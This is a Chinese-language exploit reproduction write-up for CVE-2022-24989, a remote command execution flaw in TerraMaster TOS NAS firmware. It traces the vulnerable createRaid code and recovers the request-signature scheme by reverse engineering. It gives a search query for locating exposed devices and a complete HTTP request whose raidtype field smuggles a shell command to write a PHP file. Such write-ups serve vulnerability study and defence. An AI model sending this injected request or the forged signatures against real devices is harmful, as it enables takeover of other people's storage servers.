奇安信攻防社区-TerraMaster TOS createRaid 远程命令执行漏洞 CVE-2022-24989

TerraMaster TOS createRaid 远程命令执行漏洞 CVE-2022-24989

# TerraMaster TOS createRaid 远程命令执行漏洞 CVE-2022-24989 ## 漏洞描述 TerraMaster TOS mobile.class.php文件的createRaid方法存在远程命令执行漏洞，攻击者配合 CVE-2022-24990...

TerraMaster TOS createRaid 远程命令执行漏洞 CVE-2022-24989
==================================================

漏洞描述
----

TerraMaster TOS mobile.class.php文件的createRaid方法存在远程命令执行漏洞 ，攻击者配合 CVE-2022-24990漏洞可以获取服务器权限

漏洞影响
----

TerraMaster TOS &lt; 4.2.31

网络测绘
----

"TerraMaster" &amp;&amp; header="TOS"

漏洞复现
----

登录页面

![img](https://shs3.b.qianxin.com/butian_public/f27452767d0356abf37569a5784ea3827e70e76f51159.jpg)

我们查看 `mobile.class.php文件`中的 `createRaid方法`, 其中参数`raidtype和参数diskstring`均为可控参数

![img](https://shs3.b.qianxin.com/butian_public/f689533a9b97fa0401b599b802ee58753e4eb3f96c22f.jpg)

注意这一行代码并跟踪 `volume_make_from_disks` 方法

```php
$ret = $vol->volume_make_from_disks($this->in['raidtype'], $filesystem, $disks, $volume_size);
```

![img](https://shs3.b.qianxin.com/butian_public/f159591cfb8e2d6f16a09660fbf7e026c82aa818d87c5.jpg)

可以看到方法调用中的 `$levek` 参数是可控参数，传入 `_backexec`方法中，可导致命令拼接执行恶意命令

![img](https://shs3.b.qianxin.com/butian_public/f2212242b8cfc008fc7d526894608ce7fa54d26245acf.jpg)

回到 `mobile.class.php` 文件开头的定义

```php
static $notCheck = [
        "webNasIPS", "getDiskList", "createRaid", "getInstallStat", "getIsConfigAdmin", "setAdminConfig", "isConnected",'createid',
        'user_create','user_bond','user_release','login', 'logout', 'checkCode', "wapNasIPS"
    ];
    //不验证头信息是否匹配...
    static $notHeader = ["fileDownload", "videoPlay", "imagesThumb", "imagesView", "fileUpload", "tempClear", "wapNasIPS", "webNasIPS", "isConnected"];
    private static $U = null;
    private static $filter = array(".", "..", ".svn", "lost+found", "aquota.group", "aquota.user");
```

发现 `$notHeader` 数组中并不存在方法名 `createRaid`，看一下 api.php 中的定义

![img](https://shs3.b.qianxin.com/butian_public/f22401399e004bed2f6b7e7f3e9fa20e93cac72ffe833.jpg)

```php
$instance = new $class();
if (!in_array($function, $class::$notHeader)) {
    #防止请求重放验证...
    if (tos_encrypt_str($_SERVER['HTTP_TIMESTAMP']) != $_SERVER['HTTP_SIGNATURE'] || $_SERVER['REQUEST_TIME'] - $_SERVER['HTTP_TIMESTAMP'] > 300) {
        $instance->output("Illegal request, timeout!", 0);
    }
}
$instance->$function();
```

由于实例化的过程中存在验证请求头，所以需要通过if判断才能调用该方法进行命令执行

```php
if (tos_encrypt_str($_SERVER['HTTP_TIMESTAMP']) != $_SERVER['HTTP_SIGNATURE'] || $_SERVER['REQUEST_TIME'] - $_SERVER['HTTP_TIMESTAMP'] > 300) {
        $instance->output("Illegal request, timeout!", 0);
    }
```

看到这里主要是两个参数值得关注: `HTTP_TIMESTAMP` 和 `HTTP_SIGNATURE`

跟踪方法 tos\_encrypt\_str 在源码中并没有找到，我们查看下php扩展函数列表

![img](https://shs3.b.qianxin.com/butian_public/f95665719316984a71d7367ab44d806cb705f70da4bbc.jpg)

![img](https://shs3.b.qianxin.com/butian_public/f766448c86ddd0ff23252b7428a2f54d54c9ff3e0a32e.jpg)

下载这个 so文件使用 IDA打开 搜索字符串 `tos_encrypt_str`

![img](https://shs3.b.qianxin.com/butian_public/f667522059ef391b87bf7d53dd4be6e4237814d6e286b.jpg)

![img](https://shs3.b.qianxin.com/butian_public/f268090486919a6090c8ac66b2ffdbc506557c0dd2501.jpg)

跟进方法 `get_mac_addr`

![img](https://shs3.b.qianxin.com/butian_public/f157376eb08c16f5cc1d6910560adbc4f1e7170704669.jpg)

这里可以看到获取 `eth0网卡`的 `mac`，再经过 `php_sprintf`， 跟进下 `&ubk_38fa`

![img](https://shs3.b.qianxin.com/butian_public/f3613361608c27abdea0b2967ba74b4393454d2191db6.jpg)

实际上就是获取了 mac的最后3个字节, 例如mac地址为: 11.22.33.44.55.66, 经过后获取为 445566

![img](https://shs3.b.qianxin.com/butian_public/f898601cc7662a1b418dedceebc193498d26221ac5fc0.jpg)

回到函数执行的地方，我们就可以知道，实际上这个函数等同于

```php
# mac addr 11:22:33:44:55:66
tos_encrypt_str(xxxxxx) = md5(445566xxxxxx)
```

看看之前的判断代码

TIMESTAMP参数为当前时间戳，这里的判断逻辑就很清楚了

```php
md5(mac地址后三字节 + 当前时间戳) = $_SERVER['HTTP_SIGNATURE']
```

通过之前提到的漏洞 `CVE-2022-24990` 泄漏的 PWD和mac地址，我们就可以利用这个命令执行漏洞了, 通过刚刚的逻辑写POC获取信息

![image-20220320004751660](https://shs3.b.qianxin.com/butian_public/f701523f955c82a9abd6a4b1946e4aefabdee75d1c87c.jpg)

在发送请求包写入 php恶意文件

```php
POST /module/api.php?mobile/createRaid HTTP/1.1
Host: 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Authorization: $1$hq6UR8XW$ti.QT5f9wQQg1PcJFWdub/
Cache-Control: max-age=0
Content-Length: 82
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=f1d33267c0ee0c34e9a348402205e272; tos_visit_time=1647670158
Signature: e856010781d0efd904d57ac40517859c
Timestamp: 1647678138
Upgrade-Insecure-Requests: 1
User-Agent: TNAS

raidtype=%3Becho+%22%3C%3Fphp+phpinfo%28%29%3B%3F%3E%22%3Evuln.php&diskstring=XXXX
```

![img](https://shs3.b.qianxin.com/butian_public/f581501cdd77ec411b3bc71c575a3bc9b24ae599acb6c.jpg)

访问写入的文件

![img](https://shs3.b.qianxin.com/butian_public/f280608955feb93dc5bd9e44365af7f788657aa221c9a.jpg)

发表于 2024-07-12 18:47:36
阅读 ( 1001 )
分类：Web应用

TerraMaster TOS createRaid 远程命令执行漏洞 CVE-2022-24989

0 条评论